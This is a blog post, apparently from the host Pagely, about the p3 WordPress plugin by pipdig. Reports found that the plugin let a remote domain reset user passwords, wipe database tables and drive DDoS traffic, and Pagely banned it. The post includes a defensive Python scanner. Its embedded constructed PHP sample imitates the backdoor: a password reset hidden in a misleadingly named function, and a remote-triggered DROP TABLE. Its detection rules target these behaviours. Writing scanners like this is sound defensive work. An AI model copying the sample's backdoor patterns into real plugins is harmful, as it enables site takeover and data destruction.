We spend every April 1st playing jokes on each other that rely on comical hoaxes and abuse our trust, but make us giggle during this annual tradition. We know these fantastical stories are most likely false and intended to entertain. Stories like T Mobile’s Phone BoothE, Nissin’s Cup o Noodles headphones, or Auntie Anne’s Hot Yoga Classes all strike a nice chord of absurdist humor and harmless pranks.
There was another story in the headlines about abusing trust which, it appears, was not a hoax and was far from harmless. In the days prior to April Fools’ Day this year it was reported by multiple parties that the p3 plugin (a premium plugin by pipdig) included multiple sections of code which, for all intents and purposes, appeared to be high risk or intentionally malicious.
The details of the reportedly malicious code found in the plugin have been covered by two reporting parties here and here.
The TL;DR for what the plugin was doing based on the above reports was:
1) The plugin allowed whoever controls “pipdigz.co.uk” to change your WordPress user account passwords to the string “p3_safe_styles”, as long as they knew the email address associated with the account.
2) The code that changed passwords was hidden in a function named “p3_check_social_links()”, even though the only thing the “p3_check_social_links()” function did was call “wp_set_password()”. This appears to be an attempt to obfuscate the intention of the code.
3) The code would delete all database tables associated with the site IF your website’s domain name was found on a page hosted on “pipdigz.co.uk”.
4) The sites utilizing the plugin could be used as part of a Distributed Denial of Service network, targeting URL(s) found on a page hosted on “pipdigz.co.uk”.
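As an added defender-side example (not code from the reports, from pipdig, or from Pagely), the script below performs the kind of static indicator scan a host or site owner could run over a plugin directory to surface the first three behaviours listed above before a human reviews the code. The plugin source embedded in it is constructed to mimic the shapes described in the reports and is not the p3 plugin’s actual code; the URL path, request parameter and file names in it are placeholders.

```python
"""Static indicator scan for WordPress plugin source (added example).

Flags: calls that reset passwords, destructive SQL, code that fetches
content from a hard-coded external host, and password-resetting code
hidden inside a function whose name gives no hint of it. Findings are
hints for a human review, not proof of malice.
"""
import os
import re
from dataclasses import dataclass
from typing import Dict, Iterator, List, Set, Tuple

# Constructed sample standing in for the result of reading a plugin
# directory. It only imitates the shapes reported for p3; the path under
# the host and the request parameter are placeholders, not real values.
SAMPLE_PLUGIN_SOURCE: Dict[str, str] = {
    "inc/social.php": '''<?php
function p3_check_social_links() {
    $user = get_user_by('email', $_GET['email']);
    wp_set_password('p3_safe_styles', $user->ID);
}
''',
    "inc/maintenance.php": '''<?php
$list = wp_remote_get('https://pipdigz.co.uk/PLACEHOLDER-PATH');
if (strpos(wp_remote_retrieve_body($list), home_url()) !== false) {
    global $wpdb;
    $wpdb->query("DROP TABLE {$wpdb->posts}");
}
''',
    "inc/harmless.php": '''<?php
function p3_get_version() { return true; }
''',
}

# Each rule is (name, pattern); a match is reported with its line number.
RULES: List[Tuple[str, "re.Pattern[str]"]] = [
    ("remote-password-reset", re.compile(r"\bwp_set_password\s*\(")),
    ("destructive-sql", re.compile(r"\bDROP\s+TABLE\b", re.IGNORECASE)),
    # Any fetch whose first argument is a literal http(s) URL, i.e. a hard-coded
    # external host the plugin phones home to.
    ("hardcoded-remote-fetch", re.compile(
        r"\b(?:wp_remote_get|wp_remote_post|file_get_contents|curl_init)"
        r"\s*\(\s*['\"]https?://")),
]

FUNC_RE = re.compile(r"\bfunction\s+([A-Za-z_]\w*)\s*\(")


@dataclass(frozen=True)
class Finding:
    path: str
    line: int
    rule: str
    detail: str


def _function_bodies(source: str) -> Iterator[Tuple[str, str, int]]:
    """Yield (name, body, line) for each PHP function, by simple brace matching."""
    for m in FUNC_RE.finditer(source):
        start = source.find("{", m.end())
        if start == -1:
            continue
        depth = 0
        for i in range(start, len(source)):
            if source[i] == "{":
                depth += 1
            elif source[i] == "}":
                depth -= 1
                if depth == 0:
                    line = source.count("\n", 0, m.start()) + 1
                    yield m.group(1), source[start:i + 1], line
                    break


def scan_source(files: Dict[str, str]) -> List[Finding]:
    """Run every rule over every file; return findings sorted by location."""
    findings: List[Finding] = []
    for path, source in files.items():
        for rule, pattern in RULES:
            for m in pattern.finditer(source):
                line = source.count("\n", 0, m.start()) + 1
                findings.append(Finding(path, line, rule, m.group(0)))
        # Obfuscation heuristic: a function resets passwords but its name
        # does not say so (the "check_social_links" pattern from the reports).
        for name, body, line in _function_bodies(source):
            if "wp_set_password" in body and "pass" not in name.lower():
                findings.append(Finding(path, line, "misleading-function-name", name))
    return sorted(findings, key=lambda f: (f.path, f.line, f.rule))


def scan_directory(root: str) -> List[Finding]:
    """Read every .php file under root and scan it."""
    files: Dict[str, str] = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.endswith(".php"):
                full = os.path.join(dirpath, name)
                with open(full, encoding="utf-8", errors="replace") as fh:
                    files[os.path.relpath(full, root)] = fh.read()
    return scan_source(files)


def rules_hit(findings: List[Finding]) -> Set[str]:
    """The distinct rule names that fired; handy for a pass/fail gate."""
    return {f.rule for f in findings}


if __name__ == "__main__":
    import sys
    results = scan_directory(sys.argv[1]) if len(sys.argv) > 1 else scan_source(SAMPLE_PLUGIN_SOURCE)
    for f in results:
        print(f"{f.path}:{f.line}  {f.rule}  ({f.detail})")
```

Run it with a plugin directory as the only argument, or with no argument to scan the constructed sample. The rules are deliberately coarse: a legitimate plugin may call `wp_set_password` or fetch a remote update feed, so every hit needs a reader to decide whether the surrounding code justifies it. The fourth reported behaviour (sites used to flood URLs supplied from a remote page) is not reliably visible to a static scan, since it looks like an ordinary outbound request; that one is better caught by egress monitoring on the host.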
The author of the p3 plugin, pipdig, has issued a rebuttal citing that the code had a valid purpose and was not being used how the reporting parties have claimed. It isn’t certain they ever abused this level of access, but the code cannot lie and we confirmed the code was allowing whoever controlled pipdigz.co.uk to take the above actions and we believe that is a higher level of trust than was implied when people installed this plugin.
Pagely staff have already reached out to our customers running the p3 plugin and confirmed the reportedly malicious code did, in fact, exist on their sites. Pagely’s security team discussed with our customers running the p3 plugin what risks this plugin added to their site, and we confirmed the reported malicious code worked as explained in the above reports by independently verifying the code existed and could be used in this manner. With the independent confirmation that these high-risk bits of code existed in the plugin and our staff’s help clarifying points, our customers agreed they did not wish to continue running this plugin on their sites.
Trust is a commitment and must be earned. Due to the high-risk code that was introduced in the p3 plugin, Pagely’s staff has decided to add this plugin to the Pagely banned plugin list. Plugins on the banned plugin list are not allowed on our network and are auto-disabled if detected. Most of the banned plugins on this list are there due to conflicts with existing services (cache or backups), and many are there due to risk to the site if they are installed.
The p3 plugin by pipdig is not the first plugin the Pagely team has banned for high-risk code, but it’s the first we believe was related to distrust of an author who is still actively developing the plugin. We hope it will be the first to be unbanned once the author is able to redeem themselves. We would hope that in the future the author of the p3 plugin shows everyone they can be trusted to provide code that is safe to run on websites. We are aware pipdig has already removed much of the reported malicious code in their most recent release. Removing the high-risk code is a great first step on the road to regaining trust. I look forward to watching pipdig continue their momentum to show that they are committed to their users and are worthy of being trusted to install code on your sites. In the meantime, our duty is to protect our customers and our servers, and this plugin will remain banned until trust has been restored.
This whole debacle is a reminder of how much trust site owners put into the developers of the plugins and the designers of the themes installed on their WordPress sites. Many themes and plugins are freely available from WP.org, but they still require your attention and care. Plugins have been abused in the past, and we have reported on such abuses, like when an author hands off their plugin to a malicious developer (without knowing that the new developer had nefarious intentions). The incident with the p3 plugin is another problem along the same lines: the loss of trust in the plugin developer. If you’re a site owner and your site’s plugins have always been safe and secure, maybe it’s time to send out some thank-you emails to all the developers who have given you not only a useful tool on your site but also not abused your trust. It’s always best knowing you’ve put your trust in the right hands, and it makes April Fools’ Day a lot more enjoyable.
Did you see Elon Musk released an auto-tuned rap single RIP Harambe? That wasn’t an April Fools’ joke … sometimes hoaxes are best left as hoaxes, we trusted you Elon!